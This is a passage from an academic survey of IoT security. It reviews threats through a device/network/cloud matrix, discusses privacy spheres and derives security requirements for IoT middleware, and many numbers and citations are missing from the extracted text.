requirements on iot middleware. in the second part of this work, we use a structured survey methodology to identify a set of middleware designed to support iot systems. we start with a specific set of search terms used against a meta-search engine to search across multiple databases. then we reviewed the abstracts of each identified paper and from these we identified a number of middleware systems. once the middleware systems we identified, we did not confine ourselves to the identified papers but also reviewed open source code, / security characteristic ! a. device / hardware! b. network! c. cloud / server- side ! . confidentiality ! a . hardware attacks! ! b . encryption with low capability devices ! c . privacy! data leaks ! fingerprinting! . integrity ! a . spoofing;! lack of attestation! b . signatures with low capability devices! sybil attacks! c . no common device identity! ! . availability! a . physical attacks;! b . unreliable networks, ddos, radio jamming! c . ddos! (as usual)! . authentication! a . lack of ui, ! default passwords,! hardware secret retrieval! b . default passwords, lack of secure identities! c . no common device identity, insecure flows ! . access control! a . physical access;! lack of local authentication ! b . lightweight distributed protocols for access control ! c . inappropriate use of traditional acls, ! device shadow ! . non-repudiation! a . no secure local storage; no attestation, forgery ! b . lack of signatures with low capability devices! c . lack of secure identity and signatures ! ! table . matrix of security challenges for the iot architecture documents and other resources. we evaluate each of the middleware systems against the identified requirements from the matrix evaluation. the contributions of this paper are: • a matrix model for evaluating threats to iot systems. • a structured literature review of security of middleware systems for iot. matrix evaluation table shows the matrix we will use for evaluating security challenges. in each cell we summarise the main challenges that are different in the iot world or at least exacerbated by the challenges of iot compared to existing internet security challenges. we will explore each cell in the matrix in detail below. each of the cells is given a designation from a to c and these letters are used as a key to refer to the cells below. the three aspects (hardware/device, network, cloud/server) were chosen because as we read the available literature these areas became clear as a way of segmenting the unique challenges within the context of the iot. these form a clear logical grouping of the different assets involved in iot systems. we will provide a quick overview of each area before we look in detail at each cell of the matrix. / device and hardware iot devices have specific challenges that go beyond those of existing internet clients. these challenges come from: the different form factors of iot devices, from the power requirements of iot devices, and from the hardware aspects of iot devices. the rise of cheap mobile telephony has driven down the costs of -bit processors (especially those based around the arm architec- ture [ ]), and this is increasingly creating lower cost microcontrollers and system-on-chip (soc) devices based on arm. however, there are still many iot devices built on -bit processors, and occasionally, -bit [ ]. in particular the open source hardware platform arduino [ ] supports both -bit and -bit controllers, but the -bit controllers remain considerably cheaper and at the time of writing are still widely used. the challenges of low-power hardware mean that certain technologies are more or less suitable. in the details of each cell below we will address specific details as they pertain to security. in addition, there are specific protocols and approaches designed for iot usage that use less power and are more effective. in [ ] there is a comparison of extensible markup language (xml) parsing with binary alternatives. the processing time on a constrained device is more than a magnitude slower using xml, and that the heap memory used by xml is more than kb greater than with binary formats. these improvements result in a % saving in power usage in their tests. xml security standards such as xml encryption and the related ws-encryption standard have significant problems in an iot device model. for example, any digital signature in xml security needs a process known as xml canonicalisation (xml c n). xml canonicalisation is a costly process in both time and memory. [ ] shows that the memory usage is more than × the size of the message in memory (and xml messages are already large for iot devices). we looked for any work on implementing ws-security on arduino, esp or atmel systems (which are common targets for iot device implementations) without success. xml performance on small devices can be improved using efficient xml interchange (exi), which reduces network traffic [ ]. network iot devices may use much lower power, lower bandwidth networks than existing internet systems. cellular networks often have much higher latency and more “dropouts” than fixed networks [ ]. the protocols that are used for the web are often too data-intensive and power-hungry for iot devices. network security approaches such as encryption and digital signatures are difficult and in some cases impractical in small devices. new low-power, low-bandwidth networks such as lorawan are gaining significant traction. there have been some limited studies comparing the power usage of different protocols. in [ ] there is comparison of using constrained application protocol (coap) with exi against hypertext transfer protocol (http), showing efficiency gains in using coap. in [ ], mqtt over tls is shown to use less power than http over tls in several scenarios. in [], there is a comparison of network traffic between coap and message queueing telemetry transport (mqtt) showing that each performs better in different scenarios, with similar overall performance. this is an area where more study is clearly needed, but we can draw conclusions that traditional protocols such as simple object access protocol (soap)/http are unsuited to iot usage. cloud/server-side while many of the existing challenges apply here, there are some aspects that are exacerbated by the iot for the server-side or cloud infrastructure. these include: the often highly personal nature of data that is being collected and the requirement to manage privacy; the need to provide user-managed controls for access; and the lack of clear identities for devices making it easier to spoof or impersonate devices. . a . device confidentiality hardware devices have their own challenges for security. there are systems that can provide tamper- proofing and try to minimise attacks, but if an attacker has direct access to the hardware, they can often break it in many ways. for example, there are devices that will copy the memory from flash memory into another system (known as nand mirroring). code that has been secured can often be broken with https://www.lora-alliance.org/ / scanning electron microscopes. skorobogatov from cambridge university has written a comprehensive study [ ] of many semi-invasive attacks that can be done on hardware. another common attack is called a side-channel attack [ , ] where the power usage or other indirect information from the device can be used to steal information. this means that it is very difficult to protect secrets on a device from a committed attacker. a specific outcome of this is that designers should not rely on obscurity to protect devices. a clear example of this was the mifare card used as the london oyster card and for many other authentication and smart-card applications. the designers created their own cryptographic approach and encryption algorithms. security researchers used a number of techniques to break the obscurity, decode the algorithm, find flaws in it and create a hack that allowed free transport in london as well as breaking the security on a number of military installations and nuclear power plants [ ]. similarly, relying on the security of a device to protect a key that is used across many devices is a significant error. for example, the encryption keys used in dvd players and xbox gaming consoles [ ] were broken meaning that all devices were susceptible to attack. a related issue to confidentiality of the data on the device is the challenges inherent in updating devices and pushing keys out to devices. the use of public key infrastructure (pki) requires devices to be updated as certificates expire. the complexity of performing updates on iot devices is harder, especially in smaller devices where there is no user interface. for example, some devices need to be connected to a laptop in order to perform updates. others need to be taken to a dealership or vendor. the distribution and maintenance of certificates and public-keys onto embedded devices is complex [ ]. in [ ] a novel approach to supporting mutual authentication in iot networks is proposed. however, this model assumes that each device has a secure, shared key (called kir already deployed and managed into every device. as discussed above, ensuring this key is not compromised is a challenge, as the authors admit: “however, further research is required to realize the secure sharing of kir.” in addition, sensor networks may be connected intermittently to the network resulting in limited or no access to the certificate authority (ca). to address this, the use of threshold cryptographic systems that do not depend on a single central ca has been proposed [ ], but this technology is not widely adopted: in any given environment this would require many heterogeneous things to support the same threshold cryptographic approach. this requires human intervention and validation, and in many cases this is another area where security falls down. for example, many situations exist where security flaws have been fixed but because devices are in homes, or remote locations, or seen as appliances rather than computing devices, updates are not installed [ ]. the misfortune cookie [ ] demonstrates that even when security fixes are available, some manufacturers do not make them available to customers and continue to ship insecure systems. it is clear from the number of publicised attacks [ , , ] that many device designers have not adjusted to the challenges of designing devices that will be connected either directly or indirectly to the internet. a further security challenge for confidentiality and hardware is the fingerprinting of sensors or data from sensors. in [ ] it has been shown that microphones, accelerometers and other sensors within devices have unique “fingerprints” that can uniquely identify devices. effectively there are small random differences in the physical devices that appear during manufacturing that can be identified and used to recognise individual devices across multiple interactions. . b : network confidentiality the confidentiality of data on the network is usually protected by encryption of the data. there are a number of challenges with using encryption in small devices. performing public key encryption on -bit microcontrollers has been enhanced by the use of elliptic curve cryptography (ecc) [ , ]. ecc reduces the time and power requirements for the same level of encryption as an equivalent rivest, shamir, and adleman public key cryptography (rsa) public-key encryption [ ] by an order of magnitude [ , , ]: rsa encryption on constrained -bit microcontrollers may take minutes to complete, whereas similar ecc-based cryptography completes in seconds. however, despite the fact that ecc enables -bit microcontrollers to participate in public-key encryption systems, in many cases it is not used. we can speculate as to why this is: firstly, as evidenced by [ ], the encryption algorithms consume a large proportion of the available rom on small controllers. secondly, there is a lack of standard open source software. for example, a search that we carried out (on the st april ) of the popular open source site github for the words “arduino” and “encryption” revealed repositories / compared to “arduino” and “http” which revealed repositories. these repositories were not limited to network level encryption. however, recently an open source library for aes on arduino [ ] has made the it more effective to use cryptography on atmel-based hardware. while ecc is making it possible for low-power devices to be more efficient in performing cryptography operations, in the nsa made an unprecedented warning against ecc . we don’t yet know why, as of the time of writing. there are differing theories. one known issue with both prime numbers and elliptic curves is quantum computing. in quantum computers, instead of each bit being or , each qubit allows a superposition of both and , allowing quantum computers to solve problems that are very slow for classical computers in a fraction of the time. at the moment general purpose quantum computers are very simple and confined to laboratories, but they are increasing in power and reliability. in , peter shor identified an algorithm for quantum computers [ ] that performs prime factorization in polynomial time, which effectively means that most existing public key cryptography (pkc) will be broken once sufficiently powerful quantum computers come online. given that most quantum computers are as yet ineffective, there is some concern that maybe the problem with ecc is actually based on classical computing, but this is all speculation. one thing that we do know is that ecc is much easier to do on iot devices, and especially on low-power, - or -bit systems. therefore this warning is worrying for iot developers. another key challenge in confidentiality is the complexity of the most commonly used encryption protocols. the standard transport layer security (tls) [ ] protocol can be configured to use ecc, but even in this case the handshake process requires a number of message flows and is sub-optimal for small devices as documented in [ ]. [ ] has argued that using tls with pre shared key (psk) improves the handshake. psk effectively allows tls to use traditional symmetric cryptography instead of public key (assymetric) cryptography. however, they fail to discuss in any detail the significant challenges with using psk with iot devices: the fact that either individual symmetric keys need to be deployed onto each device during the device manufacturing process, or the same key re-used. in this case there is a serious security risk that a single device will be broken and thus the key will be available. some iot devices use user datagram protocol (udp) instead of the more commonly used transport control protocol (tcp). both protocols are supported on the internet. udp is unreliable, and is typically better suited to local communications on trusted networks. it is more commonly used between iot devices and gateways rather than directly over the internet, although, like all generalisations there are exceptions to this rule. tls only works with tcp, and there is an alternative protocol for udp. datagram transport layer security (dtls) [ ] provides a mapping of tls to udp networks, by adding retransmission and sequencing which are assumed by tls. while the combination of dtls and udp is lighter-weight than tls and tcp, there is still a reasonably large ram and rom size required for this [ ], and this requires that messages be sent over udp which has significant issues with firewalls and home routers, making it a less effective protocol for iot applications [ ]. there is ongoing work at the ietf to produce an effective profile of both tls and dtls for the iot [ ]. a significant area of challenge for network confidentiality in iot is the emergence of new radio protocols for networking. previously there were equivalent challenges with wifi networks as protocols such as wired equivalency privacy (wep) were broken [ ], and there are new attacks on protocols such as bluetooth low energy (ble) (also known as bluetooth . ). for example, while ble utilises advanced encryption standard (aes) encryption which has a known security profile, a new key exchange protocol was created, which turns out to be flawed, allowing any attacker present during key exchange to intercept all future communications [ ]. one significant challenge for iot is the length of time it takes for vulnerabilities to be addressed when hardware assets are involved. while the ble key exchange issues are addressed in the latest revision of ble, we can expect it to take a very long time for the devices that encode the flawed version in hardware to be replaced, due to the very large number of devices and the lack of updates for many devices. by analogy, many years after the wep issues were uncovered, in a study showed that % of wifi networks were still at risk [ ]. even without concerning the confidentiality of the data, there is one further confidentiality issue around iot devices in the network and that is confidentiality of the metadata. many iot systems rely on radio transmission and in many cases they can be fingerprinted or identified by the radio signature. the same search was repeated on the th feb . the number of repositories for “arduino” and “encryption” had grown to , while for “arduino” and “http” had reached , demonstrating that support for encryption is growing slowly. https://threatpost.com/nsas-divorce-from-ecc-causing-crypto-hand-wringing/ / / for example, bluetooth and wifi systems use unique identifiers called mac address (media access control). these can be identified by scanning, and there have been a number of systems deployed to do that, including in airports and in cities [ ]. these systems effectively can follow users geographically around. if the user then connects to a system, that fingerprint can be associated with the user and the previously collected location information can be correlated with that user. in a similar attack, security researchers recently found [ ] that they could fingerprint cars based on transmissions from tyre pressure monitors, and in addition that they could drive behind a car and from up to feet away they could signal to the driver that the tyre pressure was dangerously low when in fact it wasn’t. such an attack could easily be used to get a driver to stop and leave their car. in [ ] a theoretical model of traceability of iot devices and particularly radio frequency identi- fication device (rfid) systems is proposed in order to prevent unauthorised data being accessible. a protocol that preserves the concept of untraceability is proposed. many of the same references and issues apply to section b where we look at the use of digital signatures with low power devices. . c . cloud confidentiality in the main, the issues around cloud confidentiality are the same as the issues in non-iot systems. there are however, some key concerns over privacy that are unique to the internet of things. for example, the company fitbit [ ] made data about users sexual activity available and easily searchable online [ ] by default. there are social and policy issues regarding the ownership of data created by iot devices [ , ]. we address these issues in more detail in the cell c where we look at the access control of iot data and systems in the cloud and on the server-side. a second concern that is exacerbated by the internet of things are concerns with correlation of data and metadata, especially around de-anonymisation. in [ ] it was shown that anonymous metadata could be de-anonymized by correlating it with other publicly available social metadata. this is a significant concern with iot data. this is also closely related to the fingerprinting of sensors within devices as discussed in cell a . an important model for addressing these issues in the cloud are systems that filter, summarise and use stream-processing technologies to the data coming from iot devices before this data is more widely published. for example, if we only publish a summarised co-ordinate rather than the raw accelerometer data we can potentially avoid fingerprinting de-anonymisation attacks. in addition, an important concern has been raised in the recent past with the details of the government sponsored attacks from the us national security agency (nsa) and uk government communications headquarters (gchq) that have been revealed by edward snowden [ ]. these bring up three specific concerns on iot privacy and confidentiality. the first concern is the revelations that many of the encryption and security systems have had deliberate backdoor attacks added to them so as to make them less secure [ ]. the second concern is the revelation that many providers of cloud hosting systems have been forced to hand over encryption keys to the security services [ ]. the third major concern is the revelations on the extent to which metadata is utilised by the security services to build up a detailed picture of individual users [ ]. the implications of these three concerns when considered in the light of the internet of things is clear: a significantly deeper and larger amount of data and metadata will be available to security services and to other attackers who can utilize the same weaknesses that the security services compromise. . cell a : integrity & hardware/device the concept of integrity refers to maintaining the accuracy and consistency of data. in this cell of the matrix, the challenges are in maintaining the device’s code and stored data so that it can be trusted over the lifecycle of that device. in particular the integrity of the code is vital if we are to trust the data that comes from the device or the data that is sent to the device. the challenges here are viruses, firmware attacks and specific manipulation of hardware. for example, [ ] describes a worm attack on router and iot firmware, where each compromised system then compromises further systems, leaving behind a slew of untrustworthy systems. the traditional solution to such problems is attestation [ , , ]. attestation is important in two ways. firstly, attestation can be used by a remote system to ensure that the firmware is unmodified and therefore the data coming from the device is accurate. secondly, attestation is used in conjunction with hardware-based secure storage (hardware security managers, as described in [ ]) to ensure that authentication keys are not misused. the model is as follows. / in order to preserve the security of authentication keys in a machine where human interaction is involved, the user is required to authenticate. often the keys are themselves encrypted using the human’s password or a derivative of the identification parameters. however, in an unattended system, there is no human interaction. therefore the authentication keys need to be protected in some other way. encryption on its own is no help, because the encryption key is then needed and this becomes a circular problem. the solution to this is to store the authentication key in a dedicated hardware storage. however, if the firmware of the device is modified, then the modified firmware can read the authentication key, and offer it to a hacker or misuse it directly. the solution to this is for an attestation process to validate the firmware is unmodified before allowing the keys to be used. then the keys must also be encrypted before sending them over any network. these attestation models are promoted by groups such the trusted computing group [ ], and samsung knox [ ]. these rely on specialized hardware chips such as the atmel at sc [ ] which implement the concept of a trusted platform module (tpm) [ ]. there is research into running these for smart grid devices [ ]. however, whilst there is considerable discussion of using these techniques with iot, during our literature review we could not find evidence of any real-world devices apart from those based on mobile-phone platforms (e.g. phones and tablets) that implemented trusted computing and attestation. . cell b : network integrity maintaining integrity over a network is managed as part of the public-key encryption models by the use of digital signatures. the challenges for iot are exactly those we already identified in the cell b above where we described the challenges of using encryption from low-power iot devices. however, there is a further concern with iot known as the sybil attack [ ]. a sybil attack is where a peer-to-peer network is taken over when an attacker creates a sufficiently large number of fake identities to persuade the real systems of false data. a sybil attack may be carried out by introducing new iot devices into a locality or by suborning existing devices. for example, it is expected that autonomous cars may need to form local ephemeral peer-to-peer networks based on the geography of the road system. a significant threat could be provided if a sybil attack provided those cars with incorrect data about traffic flows. . c : cloud integrity the biggest concern in this area is the lack of common concepts and approaches for device identity. integrity relies on identity - without knowing who or what created data, we cannot trust that data. we address this in cells a , b and c . one specific aspect of trust in cloud for iot scenarios is where the device lacks the power to participate in trust and must therefore trust the cloud server. one key example of this is where a blockchain [ ] is being used in respect of iot devices. blockchains are cryptographically secure ledgers that typically require a significant amount of memory, disk space and processor power to work [ ]. these requirements go beyond typical iot devices and even beyond more powerful systems in iot networks such as hubs. one option to address this is to use remote attestation, but as yet there is little or no work in this space. . a : hardware availability one of the significant models used by attackers is to challenge the availability of a system, usually through a denial of service (dos) or distributed denial of service (ddos) attack. dos attacks and availability attacks are used in several ways by attackers. firstly, there may be some pure malicious or destructive urge (e.g. revenge, commercial harm, share price manipulation) in bringing down a system. secondly, availability attacks are often used as a pre-cursor to an authentication or spoofing attack. iot devices have some different attack vectors for availability attacks. these include resource consumption attacks (overloading restricted devices), physical attacks on devices. a simple availability attack on an iot device might be to force it to use more power (e.g. by initiating multiple key exchanges over bluetooth) and thereby draining the battery. another even more obvious availability challenge would be to simply physically destroy a device if it is left in a public or unprotected area. named after a character in a book who exhibits multiple personality disorder / . b . network availability there are clearly many aspects of this that are the same as existing network challenges. however, there are some issues that particularly affect iot. in particular, there are a number of attacks on local radio networks that are possible. many iot devices use radio networking (bluetooth, wifi, g, general packet radio service (gprs), lora and others) and these can be susceptible to radio jamming. in [ ] there is a survey of jamming attacks and countermeasures in wireless sensor network (wsn). another clear area of attack is simply physical access. for example, even wired networks are much more susceptible to physical attacks when the devices are spread widely over large areas. . c : cloud availability the challenges here are not new. elsewhere we looked at dos attacks and ddos attacks. the biggest challenge here is the use of iot devices themselves to create the ddos attack on the server, as in the mirai botnet. . a : device authentication we will consider the authentication of the device to the rest of the world in cells b and c . in this cell of the matrix we must consider the challenges of how users or other devices can securely authenticate to the device itself. these are however related: a user may bypass or fake the authentication to the device and thereby cause the device to incorrectly identify itself over the network to other parts of the internet. some attacks are very simple: many devices come with default passwords which are never changed by owners. in a well-publicised example [ ], a security researcher gained access to full controls of a number of “smart homes”. as discussed above, the mirai attack took control of devices that used default or easily guessed passwords. similarly many home routers are at risk through insecure authentication [ ]. such vulnerabilities can then spread to other devices on the same network as attackers take control of the local area network. a key issue here is the initial registration of the device. a major issue with hardware is when the same credential, key, or password is stored on many devices. devices are susceptible to hardware attacks (as discussed above) and the result is that the loss of a single device may compromise many or all devices. in order to prevent this, devices must either be pre-programmed with unique identifiers and credentials at manufacturing time, or must go through a registration process at setup time. in both cases this adds complexity and expense, and may compromise usability. in [ ] there is a proposal for the use of the oauth dynamic client registration [ ] process to create unique keys/credentials for each device. in [ ] there is a well-defined and secure process for device and user registration that allows users to take control of devices in scenarios where the device itself offers no user interface (ui) or a very basic ui. . b : network authentication unlike browsers or laptops where a human has the opportunity to provide authentication information such as a userid and password, iot devices normally run unattended and need to be able to power-cycle and reboot without human interaction. this means that any identifier for the device needs to be stored in the program memory (usually sram), rom or storage of the device. this brings two distinct challenges: • the device may validly authenticate, but the program code may have been changed, and therefore it may behave incorrectly. • another device may steal the authentication identifier and may spoof the device. in the sybil attack [ ] a single node or nodes may impersonate a large number of different nodes thereby taking over a whole network of sensors. in all cases, attestation is a key defence against these attacks. another defence is the use of reputation and reputational models to associate a trust value to devices on the network. reputation is a general concept widely used in all aspects of knowledge ranging from humanities, arts and social sciences to digital sciences. in computing systems, reputation is considered as a measure of how trustworthy a system is. there are two approaches to trust in computer networks: the first involves a “black and white” approach based on security certificates, policies, etc. for example, spins [ ], develops a trusted network. the second approach is probabilistic in nature, where trust is based on reputation, which is defined as a probability that an agent is trustworthy. in fact, reputation is / often seen as one measure by which trust or distrust can be built based on good or bad past experiences and observations (direct trust) [ ] or based on collected referral information (indirect trust) [ ]. in recent years, the concept of reputation has shown itself to be useful in many areas of research in computer science, particularly in the context of distributed and collaborative systems, where interesting issues of trust and security manifest themselves. therefore, one encounters several definitions, models and systems of reputation in distributed computing research (e.g. [ , , ]). there is considerable work into reputation and trust for wireless sensor networks, much of which is directly relevant to iot trust and reputation. the hermes and e-hermes [ , ] systems utilise bayesian statistical methods to calculate reputation based on how effectively nodes in a mesh network propogate messages including the reputation messages. similarly, [ ] evaluates reputation based on the packet-forwarding trustworthiness of nodes, in this case using fuzzy logic to provide the evaluation framework. another similar work is [ ] which again looks at the packet forwarding reputation of nodes. in iot, [ ] utilizes the concept of a utility function to create a reputational model for iot systems using the mqtt protocol. . c : cloud authentication the ietf has published a draft guidance on security considerations for iot [ ]. this draft does discuss both the bootstrapping of identity and the issues of privacy-aware identification. one key aspect is that of bootstrapping a secure conversation between the iot device and other systems, which includes the challenge of setting-up an encrypted and/or authenticated channel such as those using tls, host identity protocol (hip) or diet hip. hip [ ] is a protocol designed to provide a cryptographically secured endpoint to replace the use of ip addresses, which solves a significant problem – ip-address spoofing – in the internet. diet hip [ ] is a lighter-weight rendition of the same model designed specifically for iot and machine to machine (m m) interactions. while hip and diet hip solve difficult problems, they have significant disadvantages to adoption. secure device identity models that work at higher levels in the network stack, such as token-based approaches, can sit side by side with existing ip-based protocols and require no changes at lower levels of the stack. by contrast, hip and diet hip require low-level changes within the ip stack to implement. as they replace traditional ip addressing they require many systems to change before a new device using hip can successfully work. in addition, neither hip nor diet hip address the issues of federated authorization and delegation. in [ ] and [ ] it is proposed to use federated identity protocols such as oauth [ ] with iot devices, especially around the mqtt protocol [ ]. the iot-oas [ ] work similarly addresses the use of oauth with coap. other related works include the work of augusto et al. [ ] have built a secure mobile digital wallet by using oauth together with the xmpp protocol [ ]. in [ ], the usage of oauth for iot devices is extended to include the use of dynamic client registration [ ] which allows each device to have its own unique identity, which we discussed as an important point in the section about cell a . a contradictory aspect of iot authentication is the proposal to use secure pseudonyms. a pseudonym is also sometimes referred to as an anonymous identity. effectively, a secure pseudonym is a way of a user securely interacting with a system without giving away their real identity. this overlaps with cell c where we look at access control for cloud systems. we have seen from well-publicised cases that systems may be compromised and offer personal information, even years after that information was originally stored. in one case, two suicides have been attributed to an attack that compromised personal identities [ ]. pseudonyms are an approach that can be considered to treat the sharing of meta-data as important as sharing of data. also see section where we look at another model of privacy. in [ ] a capability-based access system is described that allows anonymous identities to be used. [ ] provides an architecture reference model for an approach that supports anonymous identities. neither of these systems separate the provision of anonymous identities from the data-sharing middleware. a concept called zooko’s triangle [ ] proposed that it is only possible to support two out of the following three capabilities in a system: human-readable names; decentralised infrastructure; and security. recent papers, such as [ ], claim that the blockchain construct proves zooko’s hypothesis wrong. in [ ] the concept of anonymous identities for blockchains is explored, which will have significant impact as blockchains become more prevalent in iot. / . a : device access control there are two challenges to access control at the device level. firstly, devices are often physically distributed and so an attacker is likely to be able to gain physical access to the device. the challenges here (hardware attacks, nand mirroring, etc) were already discussed in cell a . however, there is a further challenge: access control almost always requires a concept of identity. we cannot restrict or allow access except in the most basic ways without some form of authentication to the device. as discussed in our review of cell a , this is a significant challenge. to give a real life example, certain mobile phones have recently started encrypting data based on the user’s own lock-screen personal identification number (pin) code [ ]. this guarantees the data cannot be read without the user’s pin code. however, using nand mirroring, it has been demonstrated that the controls that stop repeated attempts at pin codes can be overcome [ ], with the result that a digit pin can easily be broken within a reasonable amount of time. systems such as webinos [ ] have proposed using policy-based access control mechanisms such as xml access control markup language (xacml) [ ] for iot devices. however, xacml is relatively heavyweight and expensive to implement [ ], especially in the context of low power devices. to address this, webinos has developed an engine which can calculate the subset of the policy that is relevant to a particular device. despite this innovation, the storage, transmission and processing costs of xacml are still high for an iot device. another approach based around a standard called uma is covered in cell c . . b : network access control there are a number of researchers looking at how to create new lightweight protocols for access control in iot scenarios. [ ] describe a new protocol for iot authentication and access control is proposed based on ecc with a lightweight handshake mechanism to provide an effective approach for iot, especially in mobility cases. [ ] propose a non-centralised approach for access control that uses ecc once again and supports capability tokens in the coap protocol. . c : cloud access control the biggest challenge for privacy is ensuring access control at the server or cloud environment of data collected from the iot. there is some significant overlap with the area of confidentiality of data in the cloud as well (cell c ). it is argued in [ ] that existing hierarchical models of access control are not appropriate for the scale and scope of the iot. there are two main approaches to address this. the first is policy-based security models where roles and groups are replaces by more generic policies that capture real-world requirements such as “a doctor may view a patient’s record if they are treating that patient in the emergency room”. the second approach to support the scale of iot is user-directed security controls, otherwise known as consent. this is the approach we take in this thesis. in [ ] a strong case is made for ensuring that users can control access to their own resources and to the data produced by the iot that relates to those users. the user managed access (uma) from the kantara initiative enhances the oauth specification to provide a rich environment for users to select their own data sharing preferences [ ]. we would argue strongly that this overall concept of user-directed access control to iot data is one of the most important approaches to ensuring privacy. in [ ], an approach for using uma together with oauth is proposed for constrained devices. this approach also addresses cell a . while this approach has a lot of capabilities and power, there is a slow uptake of uma in real-world services and even less in iot. we propose that the complexity of this approach is the inhibitor to widespread adoption. [ ] argues that contextual approaches must be taken to ensure privacy with the iot. many modern security systems use context and reputation to establish trust and to prevent data leaks. context-based security [ ] defines this approach which is now implemented by major web systems including google and facebook. this is closely related to reputation-based models which we discussed above. . a : device non-repudiation the biggest challenge in the non-repudiation network with iot devices is the challenge of using attestation for small devices. attestation is discussed in detail in cell a . without attestation, we cannot trust that the device system has not been modified and therefore it is not possible to trust any non-repudiation data from the device. / . b : network non-repudiation the same challenges apply here as discussed in cells b , b . non-repudiation on the wire requires cryptography techniques and these are often hindered by resource restrictions on small devices. in [ ] a non-repudiation protocol for restricted devices is proposed. . c : cloud non-repudiation this area is unchanged by the iot, so we do not discuss it any further. in the previous eighteen sections we have outlined a significant number of threats and challenges, and used this matrix to assess the most relevant current work in each space. before summarising this work, we look at an orthogonal model more closely focussed on user privacy. this model will be used in later sections to assess the outcomes of this thesis. three layer privacy model one area that crosses most or all of the cells in our matrix is the need for a holistic and studied approach to enabling privacy in the iot. as discussed in a number of cells, there are significant challenges to privacy with the increased data and metadata that is being made available by iot-connected devices. an approach that has been proposed to address this is privacy by design [ ]. this approach suggests that systems should be designed from the ground up with the concept of privacy built into the heart of each system. many systems have added security or privacy controls as “add-ons”, with the result that unforeseen attacks can occur. spiekermann and cranor [ ] offer a model for looking at user privacy. in their model, they identify three spheres: the user sphere, the joint sphere and the recipient sphere. the user sphere is completely in the control of the user (e.g. a laptop). the joint sphere refers to areas that may seem to be in the user’s control, but may have some significant control by a third-party. for example, a cloud email account may seem like the user can delete emails, but the cloud provider may in fact back these up and keep a copy. finally, once data has been transferred to a third-party, it is assumed to be in the recipient sphere, where the only controls are legal and contractual. in the model, a device that offers the user full control is firmly in the user sphere. however, we would argue that many current devices are actually in the joint sphere. this is where the device appears to be in the control of the user but in fact is in the control of a third-party. to give an example, the google nest device offers users the opportunity to apply smart heating controls to their house. while a number of user-centred controls give the user the impression that it is in the user sphere, there are two key reasons to counter this: firstly, the data logged by the device is extensive and cannot be controlled by the user; secondly, the device auto-updates itself based on commands from google rather than based on user input [ ]. using this model, we can propose clear approaches that strengthen each of the privacy and security controls available in each sphere. figure provides an overview of this model and its applicability to the iot domain. . user sphere moving privacy and security controls back to the users inherently strengthens the user sphere and provides greater choice, thereby allowing more secure approaches to flourish. as discussed above, devices need to have secure identities, and currently these are either not provided, or provided by the device manufacturer. a second, related issue, is the ownership of devices. the mirai botnet spread because dictionary attacks allowed attackers to take ownership of devices. some systems offer models of taking ownership securely (e.g. bluetooth, near field communication (nfc)). in [ ], there is a system described where a qr code is used in conjunction with a web-based system. a third issue within the user sphere is updating the device firmware. a number of attacks have originated in lack of updates. one issue is that device manufacturers are incentivised to create new products but not to update old products. in [ ], a model is proposed whereby devices can pay for updates using a blockchain-based cryptocurrency such as bitcoin. in the [ ] there is an approach where iot devices are updated based on the secure identity and consent models used in oauth . / user sphere: device iden*ty device ownership and registra*on device updates joint sphere: consent management policies recipient sphere: consent tracking policy enforcement data revoca*on figure . three layer privacy model applied to iot . joint sphere recall that the joint sphere is the parts of the system where the user has some form of control over their data and systems, but the provider also shares control. for example, a health-monitoring device may upload data to an internet-based system and then may offer users controls on how they share data. a major change in legislation around this is the european union’s general data protection regulation (gdpr) [ ] which requires much stronger consent controls. many systems offer forms of user consent for sharing data with third parties, but these lack significant requirements. for example, many users are not aware of how to revoke consent. similarly, there is no clear place a user can identify all the consents they have approved across different devices. consent is not just about privacy. iot devices often include actuators that can act based on commands, and the security of a device includes ensuring that only authorised systems can issue commands to devices. we looked at consent a related area is that of policies. in this meaning a policy is a computer-readable expression of rights and obligations. for example, a consent approval may refer to a policy: the user might approve sharing of data to a website based on the fact that the website promises not to share the data to any other body. languages such as xacml [ ] allow complex access control policies to be encoded in xml or json. we discussed this in cell c . . recipient sphere the recipient sphere is the area where the user’s data is now out of their control. ultimately, the user must rely on legislation or legal contracts in order to maintain control of this data. of course, it is hard to police this recipient sphere: it is possible that the third-party website will share data following policies. in addition, many organisations have such complex and poorly worded policies that users are unaware of the rights they are giving up to their data. spotting illicit data shares can possibly be done using a concept of a trap street. this is the habit that map-makers have of including incorrect data to see if others copy it. similarly, iot devices could deliberately share incorrect data to specific parties to see if it leaks out against the agreed policy. / summary of the review of security issues in this section we have proposed a widened ontology for evaluating the security issues surrounding the internet of things, and examined the existing literature and research in each of the cells of the expanded matrix. we have also related these issues to spiekermann and cranor’s three layer privacy model. this is an important basis for the next section where we examine the provisions around security and privacy that are available in available middleware for the internet of things. in reviewing these areas, we identified a list of security properties and capabilities that are important for the security and privacy of iot. we will use this list in the second part of this paper as columns in a new table where we evaluate a set of middleware on their provision of these capabilities. req - integrity and confidentiality the requirement to provide integrity and confidentiality is an important aspect in any network and as discussed in cells a -b there are a number of challenges in this space for iot. req - access control maintaining access control to data that is personal or can be used to extract personal data is a key aspect of privacy. in addition, it is of prime importance with actuators that we do not allow unauthorised access to control aspects of our world. req . - consent as described in cells a -c , traditional hierarchical models of access control are ineffective for personal data and iot systems. consent approaches – such as oauth and uma – are a key requirement. req . - policy-based access control as discussed in cells a -c , policy-based access control models such as xacml enable privacy considerations and rules to be implemented effectively in iot scenarios, although in many cases models such as xacml are too heavyweight to deploy into devices. req - authentication as discussed in numerous of the cells, iot systems need a concept of authentication in order to enable integrity, confidentiality, and access control amongst other requirements. req . - federated identity as argued in cells a -c , there is a clear motivation for the use of federated models of identity for authentication in iot networks. req . - secure device identity managing the security of devices requires unique credentials to be embedded into each device and secure registration processes as discussed in cell a . req . anonymous identities in order to guard against de-anonymisation and other leakages of personally identifiable information, anonymous identities/pseudonyms can offer individuals clearer consent as to when they wish to actively share their identity, as discussed in a . req - attestation attestation is an important technique to prevent tampering with physical devices (as discussed in cells in column a) and hence issues with integrity of data as well as confidentiality in iot. req - summarisation and filtering the need to prevent de-anonymisation is a clear driver for systems to provide summarisation and filtering technologies such as stream processing. req - context-based security and reputation many modern security models adapt the security based on a number of factors, including location, time of day, previous history of systems, and other aspects known as context. another related model is that of the reputation of systems, whereby systems that have unusual or less-than-ideal behaviour can be trusted less using probabilistic models. in both cases there are clear application to iot privacy as discussed above. / while we consider pbd an important aspect, we argue that it is a meta-requirement: it effectively covers the need to implement the major security and privacy requirements from the initial design outwards. there are of course many other aspects to iot security and privacy as we have demonstrated in the matrix table and accompanying description of each cell. however, these specific aspects form an effective set of criteria by which to analyse different systems, as we show below in the next section. secure middleware for the internet of things middleware 